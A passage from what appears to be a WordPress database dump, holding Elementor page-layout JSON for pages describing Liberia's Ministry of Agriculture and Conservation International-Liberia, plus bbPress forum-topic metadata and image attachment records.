Liberia.\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"759bc05\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"138bbb1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"bb7acbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"855e3aa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:moa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(13534,2186,'_elementor_edit_mode','builder'),(13535,2186,'_elementor_template_type','wp-post'),(13536,2186,'_elementor_version','2.7.5'),(13537,2186,'_wp_page_template','default'),(13538,2186,'_elementor_data','[{\"id\":\"42f3301\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e4b6de6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a1bb6a5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7f350b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry of Agriculture (MOA) works to create an enabling environment for a more dynamic and vibrant agricultural sector to ensure sustainable food security and employment opportunities for all Liberians.<\\/p><p><span style=\\\"font-size: 14px;\\\">In addition, MOA ensures that agricultural challenges that impede production are investigated and lasting solutions found, and the farmers are provided with the supportive services and the enabling environment to produce.<\\/span><\\/p><p>The core general areas of responsibility of MOA will likely continue to consist of: agriculture, both smallholder and commercial; plantation crops; fisheries; and livestock.<\\/p><h4>Mandate<\\/h4><p>The Ministry\'s mandate is to develop the agriculture sector in collaboration with other relevant institutions in Liberia.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"759bc05\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"138bbb1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"bb7acbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"855e3aa\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:moa\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(13543,1186,'_elementor_controls_usage','a:0:{}'),(13544,1186,'_elementor_controls_usage','a:0:{}'),(13545,1186,'_bbp_forum_id','975'),(13546,1186,'_bbp_topic_id','1186'),(13547,1186,'_bbp_author_ip','41.57.95.57'),(13548,1186,'_bbp_last_reply_id','0'),(13549,1186,'_bbp_last_active_id','1186'),(13550,1186,'_bbp_last_active_time','2019-11-01 11:03:18'),(13551,1186,'_bbp_reply_count','0'),(13552,1186,'_bbp_reply_count_hidden','0'),(13553,1186,'_bbp_voice_count','1'),(13554,1186,'_bbp_engagement','3'),(13555,1356,'_elementor_controls_usage','a:0:{}'),(13556,1356,'_elementor_controls_usage','a:0:{}'),(13557,1356,'_bbp_forum_id','1174'),(13558,1356,'_bbp_topic_id','1356'),(13559,1356,'_bbp_author_ip','41.191.105.235'),(13560,1356,'_bbp_last_reply_id','0'),(13561,1356,'_bbp_last_active_id','1356'),(13562,1356,'_bbp_last_active_time','2019-11-04 01:26:29'),(13563,1356,'_bbp_reply_count','0'),(13564,1356,'_bbp_reply_count_hidden','0'),(13565,1356,'_bbp_voice_count','1'),(13566,1356,'_bbp_engagement','2'),(13567,1679,'_elementor_controls_usage','a:0:{}'),(13568,1679,'_elementor_controls_usage','a:0:{}'),(13569,1679,'_bbp_forum_id','1179'),(13570,1679,'_bbp_topic_id','1679'),(13571,1679,'_bbp_author_ip','41.191.105.225'),(13572,1679,'_bbp_last_reply_id','0'),(13573,1679,'_bbp_last_active_id','1679'),(13574,1679,'_bbp_last_active_time','2019-11-05 12:23:06'),(13575,1679,'_bbp_reply_count','0'),(13576,1679,'_bbp_reply_count_hidden','0'),(13577,1679,'_bbp_voice_count','1'),(13578,1679,'_bbp_engagement','2'),(13579,1681,'_elementor_controls_usage','a:0:{}'),(13580,1681,'_elementor_controls_usage','a:0:{}'),(13581,1681,'_bbp_forum_id','1179'),(13582,1681,'_bbp_topic_id','1681'),(13583,1681,'_bbp_author_ip','41.191.105.225'),(13584,1681,'_bbp_last_reply_id','0'),(13585,1681,'_bbp_last_active_id','1681'),(13586,1681,'_bbp_last_active_time','2019-11-05 12:23:53'),(13587,1681,'_bbp_reply_count','0'),(13588,1681,'_bbp_reply_count_hidden','0'),(13589,1681,'_bbp_voice_count','1'),(13590,1681,'_bbp_engagement','2'),(13591,1683,'_elementor_controls_usage','a:0:{}'),(13592,1683,'_elementor_controls_usage','a:0:{}'),(13593,1683,'_bbp_forum_id','1179'),(13594,1683,'_bbp_topic_id','1683'),(13595,1683,'_bbp_author_ip','41.191.105.225'),(13596,1683,'_bbp_last_reply_id','0'),(13597,1683,'_bbp_last_active_id','1683'),(13598,1683,'_bbp_last_active_time','2019-11-05 12:25:45'),(13599,1683,'_bbp_reply_count','0'),(13600,1683,'_bbp_reply_count_hidden','0'),(13601,1683,'_bbp_voice_count','1'),(13602,1683,'_bbp_engagement','2'),(13603,1796,'_elementor_controls_usage','a:0:{}'),(13604,1796,'_elementor_controls_usage','a:0:{}'),(13605,1796,'_bbp_forum_id','1174'),(13606,1796,'_bbp_topic_id','1638'),(13607,1796,'_bbp_author_ip','41.191.105.232'),(13608,1796,'_bbp_last_reply_id','0'),(13609,1796,'_bbp_last_active_id','1638'),(13610,1796,'_bbp_last_active_time','2019-11-05 09:25:49'),(13611,1796,'_bbp_reply_count','0'),(13612,1796,'_bbp_reply_count_hidden','0'),(13613,1796,'_bbp_voice_count','1'),(13614,1797,'_elementor_controls_usage','a:0:{}'),(13615,1797,'_elementor_controls_usage','a:0:{}'),(13616,1797,'_bbp_forum_id','1174'),(13617,1797,'_bbp_topic_id','1639'),(13618,1797,'_bbp_author_ip','41.191.105.232'),(13619,1797,'_bbp_last_reply_id','0'),(13620,1797,'_bbp_last_active_id','1639'),(13621,1797,'_bbp_last_active_time','2019-11-05 09:32:58'),(13622,1797,'_bbp_reply_count','0'),(13623,1797,'_bbp_reply_count_hidden','0'),(13624,1797,'_bbp_voice_count','1'),(13625,1798,'_elementor_controls_usage','a:0:{}'),(13626,1798,'_elementor_controls_usage','a:0:{}'),(13627,1798,'_bbp_forum_id','1174'),(13628,1798,'_bbp_topic_id','1640'),(13629,1798,'_bbp_author_ip','41.191.105.232'),(13630,1798,'_bbp_last_reply_id','0'),(13631,1798,'_bbp_last_active_id','1640'),(13632,1798,'_bbp_last_active_time','2019-11-05 09:38:48'),(13633,1798,'_bbp_reply_count','0'),(13634,1798,'_bbp_reply_count_hidden','0'),(13635,1798,'_bbp_voice_count','1'),(13636,1799,'_elementor_controls_usage','a:0:{}'),(13637,1799,'_elementor_controls_usage','a:0:{}'),(13638,1799,'_bbp_forum_id','1174'),(13639,1799,'_bbp_topic_id','1641'),(13640,1799,'_bbp_author_ip','41.191.105.232'),(13641,1799,'_bbp_last_reply_id','0'),(13642,1799,'_bbp_last_active_id','1641'),(13643,1799,'_bbp_last_active_time','2019-11-05 09:38:49'),(13644,1799,'_bbp_reply_count','0'),(13645,1799,'_bbp_reply_count_hidden','0'),(13646,1799,'_bbp_voice_count','1'),(13647,1800,'_elementor_controls_usage','a:0:{}'),(13648,1800,'_elementor_controls_usage','a:0:{}'),(13649,1800,'_bbp_forum_id','1174'),(13650,1800,'_bbp_topic_id','1642'),(13651,1800,'_bbp_author_ip','41.191.105.232'),(13652,1800,'_bbp_last_reply_id','0'),(13653,1800,'_bbp_last_active_id','1642'),(13654,1800,'_bbp_last_active_time','2019-11-05 09:40:26'),(13655,1800,'_bbp_reply_count','0'),(13656,1800,'_bbp_reply_count_hidden','0'),(13657,1800,'_bbp_voice_count','1'),(13658,1801,'_elementor_controls_usage','a:0:{}'),(13659,1801,'_elementor_controls_usage','a:0:{}'),(13660,1801,'_bbp_forum_id','1174'),(13661,1801,'_bbp_topic_id','1643'),(13662,1801,'_bbp_author_ip','41.191.105.232'),(13663,1801,'_bbp_last_reply_id','0'),(13664,1801,'_bbp_last_active_id','1643'),(13665,1801,'_bbp_last_active_time','2019-11-05 09:42:03'),(13666,1801,'_bbp_reply_count','0'),(13667,1801,'_bbp_reply_count_hidden','0'),(13668,1801,'_bbp_voice_count','1'),(13669,1802,'_elementor_controls_usage','a:0:{}'),(13670,1802,'_elementor_controls_usage','a:0:{}'),(13671,1802,'_bbp_forum_id','1174'),(13672,1802,'_bbp_topic_id','1644'),(13673,1802,'_bbp_author_ip','41.191.105.232'),(13674,1802,'_bbp_last_reply_id','0'),(13675,1802,'_bbp_last_active_id','1644'),(13676,1802,'_bbp_last_active_time','2019-11-05 09:44:12'),(13677,1802,'_bbp_reply_count','0'),(13678,1802,'_bbp_reply_count_hidden','0'),(13679,1802,'_bbp_voice_count','1'),(13680,1803,'_elementor_controls_usage','a:0:{}'),(13681,1803,'_elementor_controls_usage','a:0:{}'),(13682,1803,'_bbp_forum_id','1176'),(13683,1803,'_bbp_topic_id','1645'),(13684,1803,'_bbp_author_ip','41.191.105.232'),(13685,1803,'_bbp_last_reply_id','0'),(13686,1803,'_bbp_last_active_id','1645'),(13687,1803,'_bbp_last_active_time','2019-11-05 09:48:30'),(13688,1803,'_bbp_reply_count','0'),(13689,1803,'_bbp_reply_count_hidden','0'),(13690,1803,'_bbp_voice_count','1'),(13691,1804,'_elementor_controls_usage','a:0:{}'),(13692,1804,'_elementor_controls_usage','a:0:{}'),(13693,1804,'_bbp_forum_id','1176'),(13694,1804,'_bbp_topic_id','1649'),(13695,1804,'_bbp_author_ip','41.191.105.232'),(13696,1804,'_bbp_last_reply_id','0'),(13697,1804,'_bbp_last_active_id','1649'),(13698,1804,'_bbp_last_active_time','2019-11-05 09:54:50'),(13699,1804,'_bbp_reply_count','0'),(13700,1804,'_bbp_reply_count_hidden','0'),(13701,1804,'_bbp_voice_count','1'),(13702,1805,'_elementor_controls_usage','a:0:{}'),(13703,1805,'_elementor_controls_usage','a:0:{}'),(13704,1805,'_bbp_forum_id','1176'),(13705,1805,'_bbp_topic_id','1650'),(13706,1805,'_bbp_author_ip','41.191.105.232'),(13707,1805,'_bbp_last_reply_id','0'),(13708,1805,'_bbp_last_active_id','1650'),(13709,1805,'_bbp_last_active_time','2019-11-05 09:56:49'),(13710,1805,'_bbp_reply_count','0'),(13711,1805,'_bbp_reply_count_hidden','0'),(13712,1805,'_bbp_voice_count','1'),(13713,1806,'_elementor_controls_usage','a:0:{}'),(13714,1806,'_elementor_controls_usage','a:0:{}'),(13715,1806,'_bbp_forum_id','1176'),(13716,1806,'_bbp_topic_id','1651'),(13717,1806,'_bbp_author_ip','41.191.105.232'),(13718,1806,'_bbp_last_reply_id','0'),(13719,1806,'_bbp_last_active_id','1651'),(13720,1806,'_bbp_last_active_time','2019-11-05 09:58:39'),(13721,1806,'_bbp_reply_count','0'),(13722,1806,'_bbp_reply_count_hidden','0'),(13723,1806,'_bbp_voice_count','1'),(13724,1807,'_elementor_controls_usage','a:0:{}'),(13725,1807,'_elementor_controls_usage','a:0:{}'),(13726,1807,'_bbp_forum_id','1179'),(13727,1807,'_bbp_topic_id','1652'),(13728,1807,'_bbp_author_ip','41.191.105.232'),(13729,1807,'_bbp_last_reply_id','0'),(13730,1807,'_bbp_last_active_id','1652'),(13731,1807,'_bbp_last_active_time','2019-11-05 10:04:15'),(13732,1807,'_bbp_reply_count','0'),(13733,1807,'_bbp_reply_count_hidden','0'),(13734,1807,'_bbp_voice_count','1'),(13735,1808,'_elementor_controls_usage','a:0:{}'),(13736,1808,'_elementor_controls_usage','a:0:{}'),(13737,1808,'_bbp_forum_id','1179'),(13738,1808,'_bbp_topic_id','1685'),(13739,1808,'_bbp_author_ip','41.191.105.225'),(13740,1808,'_bbp_last_reply_id','0'),(13741,1808,'_bbp_last_active_id','1685'),(13742,1808,'_bbp_last_active_time','2019-11-05 12:31:42'),(13743,1808,'_bbp_reply_count','0'),(13744,1808,'_bbp_reply_count_hidden','0'),(13745,1808,'_bbp_voice_count','1'),(13746,1809,'_elementor_controls_usage','a:0:{}'),(13747,1809,'_elementor_controls_usage','a:0:{}'),(13748,1809,'_bbp_forum_id','1179'),(13749,1809,'_bbp_topic_id','1686'),(13750,1809,'_bbp_author_ip','41.191.105.225'),(13751,1809,'_bbp_last_reply_id','0'),(13752,1809,'_bbp_last_active_id','1686'),(13753,1809,'_bbp_last_active_time','2019-11-05 12:34:09'),(13754,1809,'_bbp_reply_count','0'),(13755,1809,'_bbp_reply_count_hidden','0'),(13756,1809,'_bbp_voice_count','1'),(13757,1810,'_elementor_controls_usage','a:0:{}'),(13758,1810,'_elementor_controls_usage','a:0:{}'),(13759,1810,'_bbp_forum_id','1179'),(13760,1810,'_bbp_topic_id','1687'),(13761,1810,'_bbp_author_ip','41.191.105.225'),(13762,1810,'_bbp_last_reply_id','0'),(13763,1810,'_bbp_last_active_id','1687'),(13764,1810,'_bbp_last_active_time','2019-11-05 12:35:32'),(13765,1810,'_bbp_reply_count','0'),(13766,1810,'_bbp_reply_count_hidden','0'),(13767,1810,'_bbp_voice_count','1'),(13794,1813,'_elementor_controls_usage','a:0:{}'),(13795,1813,'_elementor_controls_usage','a:0:{}'),(13796,1813,'_bbp_forum_id','1179'),(13797,1813,'_bbp_topic_id','1689'),(13798,1813,'_bbp_author_ip','41.191.105.225'),(13799,1813,'_bbp_last_reply_id','0'),(13800,1813,'_bbp_last_active_id','1689'),(13801,1813,'_bbp_last_active_time','2019-11-05 12:43:15'),(13802,1813,'_bbp_reply_count','0'),(13803,1813,'_bbp_reply_count_hidden','0'),(13804,1813,'_bbp_voice_count','1'),(13805,1814,'_elementor_controls_usage','a:0:{}'),(13806,1814,'_elementor_controls_usage','a:0:{}'),(13807,1814,'_bbp_forum_id','1179'),(13808,1814,'_bbp_topic_id','1690'),(13809,1814,'_bbp_author_ip','41.191.105.225'),(13810,1814,'_bbp_last_reply_id','0'),(13811,1814,'_bbp_last_active_id','1690'),(13812,1814,'_bbp_last_active_time','2019-11-05 12:46:25'),(13813,1814,'_bbp_reply_count','0'),(13814,1814,'_bbp_reply_count_hidden','0'),(13815,1814,'_bbp_voice_count','1'),(13816,1815,'_elementor_controls_usage','a:0:{}'),(13817,1815,'_elementor_controls_usage','a:0:{}'),(13818,1815,'_bbp_forum_id','1179'),(13819,1815,'_bbp_topic_id','1692'),(13820,1815,'_bbp_author_ip','41.191.105.225'),(13821,1815,'_bbp_last_reply_id','0'),(13822,1815,'_bbp_last_active_id','1692'),(13823,1815,'_bbp_last_active_time','2019-11-05 12:49:16'),(13824,1815,'_bbp_reply_count','0'),(13825,1815,'_bbp_reply_count_hidden','0'),(13826,1815,'_bbp_voice_count','1'),(13833,2210,'_wp_attached_file','2019/11/featured_gender.jpg'),(13834,2210,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:27:\"2019/11/featured_gender.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"featured_gender-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"featured_gender-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"featured_gender-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573702754\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13835,485,'_thumbnail_id','2210'),(13839,2213,'_elementor_edit_mode','builder'),(13840,2213,'_elementor_template_type','wp-post'),(13841,2213,'_elementor_version','2.7.5'),(13842,2213,'_wp_page_template','default'),(13843,2213,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23bf9b5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As an affiliate of the global organization, Conservation International-Liberia works closely with communities, private sector, the government and civil society leaders to support nature conservation.<\\/p><p>Conservation International works to spotlight and secure the critical benefits that nature provides to humanity. Since its inception, CI have helped to protect more than 6 million square kilometers (2.3 million square miles) of land and sea across more than 70 countries. Currently with offices in 29 countries and 2,000 partners worldwide, CI\\u2019s reach is truly global.<\\/p><p>Building upon a strong foundation of science, partnership and field demonstration, Conservation International empowers societies to responsibly and sustainably care for nature, our global biodiversity, for the well-being of humanity.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"740d473\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"264bc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d731f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8526d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Coming up<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c927a2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"3e2a906\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"daadead\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related 